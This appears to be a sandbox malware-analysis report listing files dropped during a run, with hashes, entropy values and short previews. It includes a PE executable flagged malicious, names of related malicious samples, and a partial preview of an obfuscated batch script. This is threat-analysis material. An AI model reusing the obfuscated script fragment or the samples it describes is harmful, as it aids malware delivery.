                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):120
                                                                                                                                                                                                                                                                          Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                          MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                          SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                          SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                          SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):13
                                                                                                                                                                                                                                                                          Entropy (8bit):2.6612262562697895
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:NYLFRQZ:ap2Z
                                                                                                                                                                                                                                                                          MD5:B64BD80D877645C2DD14265B1A856F8A
                                                                                                                                                                                                                                                                          SHA1:F7379E1A6F8CE062E891C56736C789C7EA77CD6A
                                                                                                                                                                                                                                                                          SHA-256:83476CEEEB7682F41030664B4E17305986878D14E82D0C277FB99EC546B44569
                                                                                                                                                                                                                                                                          SHA-512:734A7316A269C76DD052D980CC0D5209C0BFEDFFC55B11C58FA25C433CE8A42536827298C3E58CACD68CC01593C23D39350E956E8DE2268D8D29918E1F0667F2
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:117.0.2045.55
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):44455
                                                                                                                                                                                                                                                                          Entropy (8bit):6.089825674951637
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWbdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn5AkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                          MD5:CC806F2E23F09AA6023A2E5346F5B3B5
                                                                                                                                                                                                                                                                          SHA1:FF9F9E726EB80F676D3FE243EBFAC5DBD48E6789
                                                                                                                                                                                                                                                                          SHA-256:23A9578985A4B4D7049112177BD6B5F7174EE3B51268E6DED5CADAB3E1BDCF1D
                                                                                                                                                                                                                                                                          SHA-512:2A2BD2253545A7E815CCE2AD78E955B78532BDC0A7632864310D61E78BE6766ECF1FDD599D51AEFF124BBFA2603A63F6D3D95521BCD2CBFCC8CFCB84CA8B67EC
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):47
                                                                                                                                                                                                                                                                          Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                          MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                          SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                          SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                          SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):35
                                                                                                                                                                                                                                                                          Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                          MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                          SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                          SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                          SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):50
                                                                                                                                                                                                                                                                          Entropy (8bit):3.9904355005135823
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:0xXF/XctY5GUf+:0RFeUf+
                                                                                                                                                                                                                                                                          MD5:E144AFBFB9EE10479AE2A9437D3FC9CA
                                                                                                                                                                                                                                                                          SHA1:5AAAC173107C688C06944D746394C21535B0514B
                                                                                                                                                                                                                                                                          SHA-256:EB28E8ED7C014F211BD81308853F407DF86AEBB5F80F8E4640C608CD772544C2
                                                                                                                                                                                                                                                                          SHA-512:837D15B3477C95D2D71391D677463A497D8D9FFBD7EB42E412DA262C9B5C82F22CE4338A0BEAA22C81A06ECA2DF7A9A98B7D61ECACE5F087912FD9BA7914AF3F
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:topTraffic_170540185939602997400506234197983529371
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):575056
                                                                                                                                                                                                                                                                          Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                          MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                          SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                          SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                          SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):9
                                                                                                                                                                                                                                                                          Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                          MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                          SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                          SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                          SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:uriCache_
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):179
                                                                                                                                                                                                                                                                          Entropy (8bit):5.017655778471233
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclQeTli:YWLSGTt1o9LuLgfGBPAzkVj/T8lQgi
                                                                                                                                                                                                                                                                          MD5:99BBB869F35EE46C2504A0E8FC8EC523
                                                                                                                                                                                                                                                                          SHA1:7CAE976F813195E74BEE5C6B05A91EEBA14E358A
                                                                                                                                                                                                                                                                          SHA-256:E3F377BC9A736C79C992CB90C5C98319493998345B836786504CFE66D0CD97E5
                                                                                                                                                                                                                                                                          SHA-512:977064B67349FB4C791ABF17A1A79A4BBFC336A41524EA204A02ED466FAAF30AD46F68F50A91BDCB1F71EB133C032C538AC37A330C2DD4BA1CE9A620777ED1F5
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1735380669750232}]}
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):86
                                                                                                                                                                                                                                                                          Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                                                                                                                          MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                                                                                                                                                                                                          SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                                                                                                                                                                                                          SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                                                                                                                                                                                                          SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                          Size (bytes):44894
                                                                                                                                                                                                                                                                          Entropy (8bit):6.095147494967383
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWJji1zNtiATNfsUrtE3PF5DKJDSgzMMd6qD47u3+CO:+/Ps+wsI7ynku4KtSmd6qE7lFoC
                                                                                                                                                                                                                                                                          MD5:D93804E0EF24300DB595C46CC2AE72EF
                                                                                                                                                                                                                                                                          SHA1:6A151B2108CA5A8F220BE9BC98EE0087BD634539
                                                                                                                                                                                                                                                                          SHA-256:914D6AFBCA213374B024480FF2E538DADE20E6ED1231A0C89CA2F7E6D4936944
                                                                                                                                                                                                                                                                          SHA-512:49E7CB7D78421093157802FF539D813E6D7B819BDDA6F6AB8A363C18E496D70F0C36110A5E6A8C98611D82CD20D05447CDF6D196444FDCC7C8185AC993A39E71
                                                                                                                                                                                                                                                                          Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2278
                                                                                                                                                                                                                                                                          Entropy (8bit):3.846618558094175
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:uiTrlKxrgxJsxl9Il8uF25W2aR8Bp2YPTFlh1Nzd1rc:mPYy5W2aR8LxlhPU
                                                                                                                                                                                                                                                                          MD5:C824917A91D447071D2DC53C58379209
                                                                                                                                                                                                                                                                          SHA1:E6BD558A526D283EC61B5799CEE68D1B25AB6546
                                                                                                                                                                                                                                                                          SHA-256:007DCB1B9922FB2B8C1B706BB44844D6631BA2A1E9D18C4DCB6CBCBED27A4B7E
                                                                                                                                                                                                                                                                          SHA-512:8423F766F38D592C42A916BE15A72F5E8D63BCA832FBB6C880F895599498ADF25CB8B2204EAA5E583864BF3A07B5C47A81C2CD2C510F82E6D23DEBCAB0CD32A0
                                                                                                                                                                                                                                                                          Malicious:false
Preview:{"TBDataStoreObject":{"Header":{"ObjectType":"TokenResponse","SchemaVersionMajor":2,"SchemaVersionMinor":1},"ObjectData":{"SystemDefinedProperties":{"RequestIndex":{"Type":"InlineBytes","IsProtected":false,"Value":"WipwWM+NHlbCDmsZp8SOsjhtFBs="},"Expiration":{"Type":"InlineBytes","IsProtected":false,"Value":"AA4xgC5Y2wE="},"Status":{"Type":"InlineBytes","IsProtected":false,"Value":"AAAAAA=="},"ResponseBytes":{"Type":"InlineBytes","IsProtected":true,"Value":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAApYqCol
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):4622
                                                                                                                                                                                                                                                                          Entropy (8bit):4.004929656303451
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:CYy50lrc6SGHqalSvHXRPPjmRjmhk1fxhd5:CUpkoSfRPKVzb75
                                                                                                                                                                                                                                                                          MD5:933F26F5A28A51ABC34C7275E3453DDD
                                                                                                                                                                                                                                                                          SHA1:C6A4245441BDF5C442C1D1A7A54194531A6EB65F
                                                                                                                                                                                                                                                                          SHA-256:43CF321C218F839EE6BEBA76E4DBC42FDB757E56EBCF70E306864D7C57668E53
                                                                                                                                                                                                                                                                          SHA-512:0BEF6B0A904C7112F5C6A717198E53BDF3947AAEDEC8153BC38B31FD05C9AF7B45EAC6DDAB0FD1F8DD3CF3E1061EBC89EE281B0494F134C9AA83CE6FA9E6471D
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2684
                                                                                                                                                                                                                                                                          Entropy (8bit):3.8960938029218872
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:uiTrlKx68Wa7xFxl9Il8uF25WLUV+G6Huygwzbknu9Bumj53dK8nYd/vc:aLYy5WLkbygGbku7Jj53dpB
                                                                                                                                                                                                                                                                          MD5:3E6374A42C99A3A4BACBCB241297453E
                                                                                                                                                                                                                                                                          SHA1:8F969ED201CF964FAFE1A10CF265ACE3EF234387
                                                                                                                                                                                                                                                                          SHA-256:B3452222DCAB706C08689C49AF177CFB5C7AB5EC836DBCF3C1E089C8B840CF72
                                                                                                                                                                                                                                                                          SHA-512:01AAE0EC60372735439774D36EFB8457B1469CEA6A2B23B3857E5866D5ACD71D44DE7DE4CD2A3EE7FCBA054EDCCB75594DA94A1098944673F36CA5F5816ACE35
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                          Size (bytes):947288
                                                                                                                                                                                                                                                                          Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                                          MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                          SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                                          SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                                          SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                                                          • Filename: yoda.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: lem.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: script.ps1, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: installer_1.05_36.4.zip, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: PodcastsTries.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: vce exam simulator 2.2.1 crackk.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: LVDdWBGnVE.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: eMBO6wS1b5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):271120
                                                                                                                                                                                                                                                                          Entropy (8bit):7.9993557269020155
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:6144:Gc4RvoyV4vGzMoN0npS8nqWhvoSTK4mXomqX8Ih:YRvgoN01rh5K4gqX5h
                                                                                                                                                                                                                                                                          MD5:37042197E6ED0CED3E18E3049135E2E5
                                                                                                                                                                                                                                                                          SHA1:26B16A34CB5646551C53C2CD45209F4237B06BE2
                                                                                                                                                                                                                                                                          SHA-256:537914B1D5A23203831B93E943BFD9C74DC117AB8D84DE22D37CA7EA2F8F8288
                                                                                                                                                                                                                                                                          SHA-512:588185840D638A0C6F167FCFAFCC64DC831D9E5A2A0AB69D8C8B201C4B905CA5DA412D908C1A00B50453259FD5B9DAC63C4376E086B26180B51A066BB714D51D
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, 487443 bytes, 11 files, at 0x2c +A "Proceedings" +A "Recovery", ID 8198, number 1, 29 datablocks, 0x1 compression
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):487443
                                                                                                                                                                                                                                                                          Entropy (8bit):7.998124391538459
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:12288:B+S9oU3XWMHVIx884xmjdmLlSM7DGRgpqb7ITX:AeoUnW1xbAlSM3BpqATX
                                                                                                                                                                                                                                                                          MD5:3E6C9EC6F7CFD6FF9E44415233734692
                                                                                                                                                                                                                                                                          SHA1:C9E302D20AADC02EEF66CCB7E0562C9D5AAD1FAE
                                                                                                                                                                                                                                                                          SHA-256:59F56DFCFF7617579EC1940D61BF2AF6EFA6DD90D0849F9B658FF56859A118B9
                                                                                                                                                                                                                                                                          SHA-512:4467EDF1AEE44166B6D7356E3A4C91AF1F38C6934F06EC6C63EA778E96190061F05759C9AC2366AA364A35AFDBE1ED6478AFAFAC7A62EA9BA3CC153AA2E35518
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):68608
                                                                                                                                                                                                                                                                          Entropy (8bit):5.767683978790837
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:Ov2j62SfuVGHj1vtK7h6R8anHsWccd0vtmgMbFuz08Qukl6:+2jfTq8QLeAg0Fuz08X5
                                                                                                                                                                                                                                                                          MD5:D562AC74A5D84C5F5418FE566482E0A6
                                                                                                                                                                                                                                                                          SHA1:86694D56F1571999F19E56C3143680B49866DDE8
                                                                                                                                                                                                                                                                          SHA-256:CCBDCE2D5D2EE43E6B214CD363E32DFBE2B14A9100DE6A179BE7B3C6D4CDAF24
                                                                                                                                                                                                                                                                          SHA-512:1E3466B2C2D23741A0CD9DB3CC594D9529C8660AC05311708606EE9809F16D67AC2B072CF0E2D423FE02A6E867A13043400064D0860B63D0C3A0BC1E855DD62A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (944), with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):25102
                                                                                                                                                                                                                                                                          Entropy (8bit):5.113247807478338
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:CLr7xw9jD6bo12DAZS4Mt0TuJuZ7kwsFZLfUwfZfLPX2to8rD6r:kXUjDt12s0BiuJuZIw0ZLffhfDK1r8
                                                                                                                                                                                                                                                                          MD5:15B3F5F2D363D4D3BC645E1261EE7E5B
                                                                                                                                                                                                                                                                          SHA1:AB35B1C8CB947A415C033AC8973137472C21F627
                                                                                                                                                                                                                                                                          SHA-256:FDED537E8EFA988E93A53FC946BA828AFCB4275A6AA1756ABCFD56F1B39A8C85
                                                                                                                                                                                                                                                                          SHA-512:5316C823881AD73C85F00A8C78398C485341488B36E4256C7E553AC06EDE4AA682C91AA5607D1AF5B7871C429B5519911C99D3AFE313EE5A93BF1648E814C998
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:Set Camp=9..QXipBelle-..AXEGoverning-Tex-Breed-Verification-Ethical-Doctors-..PIInvisible-..ahPMidlands-Brand-Keith-Promotion-Intervals-Orange-Chuck-..cyfJAccident-Creative-Luke-..dwWZRouter-Russell-Jill-Essays-Xhtml-Win-..mPWFoot-Assessments-Grant-..UyNChar-Marcus-Controller-Webcam-Johnson-Madrid-Pix-..Set Counseling=C..AFAutomation-Brighton-Ra-Pins-Illinois-Beside-Sharon-..ItTrouble-Interesting-Chips-Strap-Behaviour-Podcasts-Approx-..TDlChannels-Loose-Young-Lace-Weak-Parameters-..uVHZSmall-Rosa-Inner-..HxeSailing-Deviant-Hood-Conversations-Anytime-Comics-Congo-..YSChains-Subject-Lunch-Mint-Cartoon-Important-Nearest-..BJYQInvesting-Toddler-Allowing-..kCKeywords-..nPUSearches-..Set Focused=E..jOYValue-Easy-Tobacco-Desktop-Burlington-Ja-..TNpFailing-Daughter-..hiTested-Tribe-Females-Quote-Feature-Helpful-Butler-..hFNOperator-Detail-Tunisia-Tapes-Write-Election-Territory-Boob-Cooler-..KQteProbably-Maps-Graphical-Forgotten-..bIStrong-Oxygen-Ul-Novel-..OOSSThreshold-Camp-Tub-Dp-Influence-D
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (944), with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):25102
                                                                                                                                                                                                                                                                          Entropy (8bit):5.113247807478338
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:CLr7xw9jD6bo12DAZS4Mt0TuJuZ7kwsFZLfUwfZfLPX2to8rD6r:kXUjDt12s0BiuJuZIw0ZLffhfDK1r8
                                                                                                                                                                                                                                                                          MD5:15B3F5F2D363D4D3BC645E1261EE7E5B
                                                                                                                                                                                                                                                                          SHA1:AB35B1C8CB947A415C033AC8973137472C21F627
                                                                                                                                                                                                                                                                          SHA-256:FDED537E8EFA988E93A53FC946BA828AFCB4275A6AA1756ABCFD56F1B39A8C85
                                                                                                                                                                                                                                                                          SHA-512:5316C823881AD73C85F00A8C78398C485341488B36E4256C7E553AC06EDE4AA682C91AA5607D1AF5B7871C429B5519911C99D3AFE313EE5A93BF1648E814C998
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:Set Camp=9..QXipBelle-..AXEGoverning-Tex-Breed-Verification-Ethical-Doctors-..PIInvisible-..ahPMidlands-Brand-Keith-Promotion-Intervals-Orange-Chuck-..cyfJAccident-Creative-Luke-..dwWZRouter-Russell-Jill-Essays-Xhtml-Win-..mPWFoot-Assessments-Grant-..UyNChar-Marcus-Controller-Webcam-Johnson-Madrid-Pix-..Set Counseling=C..AFAutomation-Brighton-Ra-Pins-Illinois-Beside-Sharon-..ItTrouble-Interesting-Chips-Strap-Behaviour-Podcasts-Approx-..TDlChannels-Loose-Young-Lace-Weak-Parameters-..uVHZSmall-Rosa-Inner-..HxeSailing-Deviant-Hood-Conversations-Anytime-Comics-Congo-..YSChains-Subject-Lunch-Mint-Cartoon-Important-Nearest-..BJYQInvesting-Toddler-Allowing-..kCKeywords-..nPUSearches-..Set Focused=E..jOYValue-Easy-Tobacco-Desktop-Burlington-Ja-..TNpFailing-Daughter-..hiTested-Tribe-Females-Quote-Feature-Helpful-Butler-..hFNOperator-Detail-Tunisia-Tapes-Write-Election-Territory-Boob-Cooler-..KQteProbably-Maps-Graphical-Forgotten-..bIStrong-Oxygen-Ul-Novel-..OOSSThreshold-Camp-Tub-Dp-Influence-D
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):71680
                                                                                                                                                                                                                                                                          Entropy (8bit):6.61321542810069
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:9iKwtk2ukC5HRu+OoQjz7nts/M26N7oKzYkBvRmLORuCYm9PrpmESA:FwS2u5hVOoQ7t8T6pUkBJR8CThpmESA
                                                                                                                                                                                                                                                                          MD5:21F9A0D1A89E387CD2274ABC7CE97FE8
                                                                                                                                                                                                                                                                          SHA1:0FD8A73629F4EAF6DA323F23F34D9CF3BD365F75
                                                                                                                                                                                                                                                                          SHA-256:F494D9FCC5ACD2AAF67C78F50DD42FF180563E7B5D644499C733702577E55331
                                                                                                                                                                                                                                                                          SHA-512:DF1162A9F13847AE11FC84D7BFB42914618D24778634E2396D5FE3AC7F26D299D183DF200F7C1594A24106BD1637BEE81F702B8BD590E617CA46A2F7C5E5132D
                                                                                                                                                                                                                                                                          Malicious:false
